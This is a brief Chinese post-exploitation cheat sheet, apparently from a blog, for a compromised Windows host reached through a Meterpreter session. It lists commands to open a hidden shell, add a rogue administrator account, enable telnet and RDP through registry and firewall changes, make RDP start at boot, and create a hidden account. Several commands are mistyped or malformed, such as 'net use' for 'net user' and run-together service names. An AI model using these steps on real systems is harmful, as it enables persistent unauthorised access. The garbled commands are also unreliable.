1.获得meterpreter回话
2.execute -H -f cmd -i 执行时,创建一个交互命令shell(-i),该shell充当隐藏的进程(-H)。
3.创建用户 C:\ net use Service_Account password /add
C:\ net localgroup administrator Service_Accountt /add
4.开启telnet run gettelnet -e
启用远程Windows 终端服务
在交换式shell中修改注册表
C:\ reg add "hklm\system\currentControlSet\Control\TerminalServer" /v "AllowTSConnections" /t REG_DWORD /d 0*1 /f
C:\ reg add "hklm\system\currentControlSet\Control\TerminalServer" /v "fDenyTSConnections" /t REG_DWORD /d 0*0 /f
为了确保RDP协议能够通过客户端的防火墙。添加一条规则:
C:\ netshadvfirewall firewall set rule group =" remote desktop" new enable=Yes
开启RDP服务:
C:\ net start Terservice
这样启动没有持久性。开机自启:
C:\ sc configTermService start=auto
创建隐藏账户:
run getgui -u Service_Account -p pa$$word
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
